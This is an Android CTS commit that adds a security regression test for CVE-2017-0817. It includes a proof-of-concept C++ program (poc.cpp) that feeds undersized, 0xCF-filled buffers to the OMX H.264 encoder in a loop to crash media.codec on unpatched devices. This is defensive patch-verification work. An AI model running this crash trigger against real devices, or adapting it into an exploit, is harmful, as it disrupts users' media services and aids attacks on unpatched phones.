CTS test for Android Security b/63522430

Bug: 63522430
Bug: 68653237
Test: Ran the new testcase on android-10.0.0_r2 to test with/without patch

Change-Id: I22f22bf8314d2e79909a6127e9cfbc980cb100a1
Merged-In: I22f22bf8314d2e79909a6127e9cfbc980cb100a1
diff --git a/hostsidetests/securitybulletin/AndroidTest.xml b/hostsidetests/securitybulletin/AndroidTest.xml
index 67312e3..c1aeae7 100644
--- a/hostsidetests/securitybulletin/AndroidTest.xml
+++ b/hostsidetests/securitybulletin/AndroidTest.xml
@@ -169,6 +169,7 @@
         <!--__________________-->
         <!-- Bulletin 2018-01 -->
         <!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+        <option name="push" value="CVE-2017-0817->/data/local/tmp/CVE-2017-0817" />
         <option name="push" value="CVE-2018-9527->/data/local/tmp/CVE-2018-9527" />
 
         <!--__________________-->
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-0817/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0817/Android.bp
new file mode 100644
index 0000000..5380fb5
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0817/Android.bp
@@ -0,0 +1,51 @@
+/*
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+    name: "CVE-2017-0817",
+
+    defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+
+    srcs: [
+        "poc.cpp",
+        ":cts_hostsidetests_securitybulletin_omxutils",
+    ],
+
+    include_dirs: [
+        "frameworks/native/include/media/openmax",
+        "frameworks/av/media/libstagefright",
+        "frameworks/native/include/media/hardware",
+    ],
+
+    shared_libs: [
+        "libstagefright",
+        "libbinder",
+        "libmedia",
+        "libmedia_omx",
+        "libutils",
+        "liblog",
+        "libui",
+        "libstagefright_foundation",
+        "libcutils",
+        "libhidlbase",
+        "libhidlmemory",
+        "libnativewindow",
+        "android.hidl.allocator@1.0",
+        "android.hidl.memory@1.0",
+        "android.hardware.media.omx@1.0",
+    ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-0817/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0817/poc.cpp
new file mode 100644
index 0000000..778eef0
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0817/poc.cpp
@@ -0,0 +1,139 @@
+/**
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include "stdlib.h"
+#include "../includes/common.h"
+
+//This PoC is only for 32-bit builds.
+#if _32_BIT
+#include "../includes/omxUtils.h"
+#include <unistd.h>
+#include <hidlmemory/mapping.h>
+
+extern bool mUseTreble;
+sp<IAllocator> mAllocator = IAllocator::getService("ashmem");
+
+void exit_handler(void) {
+    omxUtilsFreeNode();
+}
+
+int allocateHidlPortBuffers(OMX_U32 portIndex, Vector<Buffer> *buffers,
+                            int BufferSize) {
+    buffers->clear();
+    OMX_PARAM_PORTDEFINITIONTYPE def;
+    int err = omxUtilsGetParameter(portIndex, &def);
+    omxExitOnError(err);
+
+    for (OMX_U32 i = 0; i < def.nBufferCountActual; ++i) {
+        Buffer buffer;
+        buffer.mFlags = 0;
+        bool success;
+        auto transStatus = mAllocator->allocate(BufferSize, [&success, &buffer](
+                bool s,
+                hidl_memory const& m) {
+            success = s;
+            buffer.mHidlMemory = m;
+        });
+        omxExitOnError(!transStatus.isOk());
+        omxExitOnError(!success);
+        buffers->push(buffer);
+    }
+    return OK;
+}
+
+void poc() {
+    int i;
+    Vector < Buffer > inputBuffers;
+    Vector < Buffer > outputBuffers;
+    status_t err = omxUtilsInit((char*) "OMX.google.h264.encoder");
+    omxExitOnError(err);
+    atexit(exit_handler);
+
+    OMX_PARAM_PORTDEFINITIONTYPE def;
+    omxUtilsGetParameter(OMX_UTILS_IP_PORT, &def);
+
+    int inMemSize = def.nBufferCountActual * def.nBufferSize / 512;
+    int inBufferCnt = def.nBufferCountActual;
+    int inBufferSize = inMemSize / inBufferCnt;
+
+    sp < MemoryDealer > dealerIn = new MemoryDealer(inMemSize);
+    IOMX::buffer_id *inBufferId = new IOMX::buffer_id[inBufferCnt];
+
+    omxUtilsGetParameter(OMX_UTILS_OP_PORT, &def);
+
+    int outMemSize = def.nBufferCountActual * def.nBufferSize;
+    int outBufferCnt = def.nBufferCountActual;
+    int outBufferSize = outMemSize / outBufferCnt;
+
+    sp < MemoryDealer > dealerOut = new MemoryDealer(outMemSize);
+    IOMX::buffer_id *outBufferId = new IOMX::buffer_id[outBufferCnt];
+
+    allocateHidlPortBuffers(OMX_UTILS_IP_PORT, &inputBuffers, inBufferSize);
+    for (i = 0; i < inBufferCnt; ++i) {
+        inBufferId[i] = inputBuffers[i].mID;
+        sp < android::hidl::memory::V1_0::IMemory > mem = mapMemory(
+                inputBuffers[i].mHidlMemory);
+        memset((void *) mem->getPointer(), 0xCF, inBufferSize);
+        omxUtilsUseBuffer(OMX_UTILS_IP_PORT, inputBuffers[i].mHidlMemory, &inBufferId[i]);
+    }
+
+    allocateHidlPortBuffers(OMX_UTILS_OP_PORT, &outputBuffers, outBufferSize);
+    for (i = 0; i < outBufferCnt; ++i) {
+        outBufferId[i] = outputBuffers[i].mID;
+        omxUtilsUseBuffer(OMX_UTILS_OP_PORT, outputBuffers[i].mHidlMemory, &outBufferId[i]);
+    }
+
+    omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateIdle);
+    omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateExecuting);
+
+    for (i = 0; i < inBufferCnt; ++i) {
+        OMXBuffer omxBuf(0, inBufferSize);
+        omxUtilsEmptyBuffer(inBufferId[i], omxBuf, 0, 0, -1);
+    }
+
+    for (i = 0; i < outBufferCnt; ++i) {
+        OMXBuffer omxBuf(0, outBufferSize);
+        omxUtilsFillBuffer(outBufferId[i], omxBuf, -1);
+    }
+
+    omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateIdle);
+    omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateLoaded);
+
+    for (i = 0; i < inBufferCnt; ++i) {
+        omxUtilsFreeBuffer(OMX_UTILS_IP_PORT, inBufferId[i]);
+    }
+
+    for (i = 0; i < outBufferCnt; ++i) {
+        omxUtilsFreeBuffer(OMX_UTILS_OP_PORT, outBufferId[i]);
+    }
+
+    omxUtilsFreeNode();
+    return;
+}
+#endif
+
+int main() {
+
+//This PoC is only for 32-bit builds.
+#if _32_BIT
+    time_t currentTime = start_timer();
+    while(timer_active(currentTime)) {
+        poc();
+    }
+#endif
+
+    return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java b/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java
index 9c5a2b7..1ce626b 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java
@@ -45,6 +45,18 @@
      ******************************************************************************/
 
     /**
+     * b/63522430
+     * Vulnerability Behaviour: SIGSEGV in media.codec
+     */
+    @SecurityTest(minPatchLevel = "2018-01")
+    @Test
+    public void testPocCVE_2017_0817() throws Exception {
+        String processPatternStrings[] = {"media\\.codec", "omx@\\d+?\\.\\d+?-service"};
+        AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2017-0817", null, getDevice(),
+                processPatternStrings);
+    }
+
+    /**
      * b/36104177
      * Vulnerability Behaviour: EXIT_VULNERABLE (113)
      */